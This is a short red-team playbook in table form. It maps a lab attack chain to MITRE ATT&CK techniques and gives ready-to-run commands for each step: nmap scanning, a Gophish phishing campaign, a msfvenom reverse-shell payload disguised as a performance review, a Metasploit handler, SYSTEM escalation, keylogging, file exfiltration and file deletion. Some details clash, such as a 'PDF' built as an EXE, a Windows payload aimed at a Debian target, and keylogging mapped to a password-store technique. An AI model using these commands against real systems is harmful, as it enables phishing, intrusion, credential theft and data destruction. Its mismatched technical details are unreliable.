# Red Team Playbook

| Step | Task                             | MITRE ATT&CK Technique            | Tools Used           | Commands / Actions                                                                                                                                                        | Expected Outcome                                                                                                                                                     |
|------|----------------------------------|-----------------------------------|----------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1    | Reconnaissance                   | T1046 - Network Service Scanning  | Nmap                 | `nmap -sS -T4 -A -v 192.168.56.102`                                                                                                                                         | Scan the target to identify open ports, services, service versions, and OS (Linux Debian 9.8 in this case). Helps determine attack vectors.                         |
| 2    | Initial Access - Spear-Phishing  | T1566.001 - Spearphishing Attachment | Gophish, SET         | - Set up SMTP in Gophish to send emails.<br>- Create Campaign with a malicious PDF attachment (using msfvenom payload).<br>- Launch Campaign in Gophish.                   | Phishing email is sent with an attachment (malicious PDF). If the victim opens it, the reverse shell payload will execute.                                            |
| 3    | Payload Crafting                 | T1204.002 - User Execution        | msfvenom             | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f exe -o performance_review.exe`                                                              | Create a reverse shell payload (EXE) that, when executed, connects back to Metasploit listener on Kali.                                                           |
| 4    | Initial Access - Execute Payload | T1204.002 - User Execution        | Metasploit           | `msfconsole`<br>`use exploit/multi/handler`<br>`set payload windows/meterpreter/reverse_tcp`<br>`set LHOST 192.168.56.101`<br>`set LPORT 4444`<br>`exploit`                | Victim opens the malicious PDF, triggering the reverse shell to connect to Metasploit, gaining a Meterpreter session.                                               |
| 5    | Privilege Escalation             | T1068 - Exploitation for Privilege Escalation | Metasploit, Meterpreter | `getsystem`                                                                                                                                                                 | Gain SYSTEM privileges on the victim machine, giving full control over the machine.                                                                                 |
| 6    | Credential Access - Keylogging   | T1555.003 - Credentials from Password Stores | Metasploit           | `keyscan_start`<br>`keyscan_dump`<br>`keyscan_stop`                                                                                                                          | Keylogger starts recording keystrokes. The attacker can later dump the captured keystrokes to extract credentials or other sensitive information.                  |
| 7    | Exfiltration                     | T1041 - Exfiltration Over Command and Control Channel | Metasploit           | `ls`<br>`download C:\\Users\\victim\\Documents\\important_file.txt`                                                                                                        | The attacker downloads sensitive files from the victim machine (e.g., documents, credentials) and exfiltrates them.                                                |
| 8    | Impact                           | T1485 - Data Destruction          | Metasploit           | `delete C:\\Users\\victim\\Documents\\important_file.txt`                                                                                                                   | The attacker can delete files or perform other destructive actions (though not always performed in every engagement).                                                |
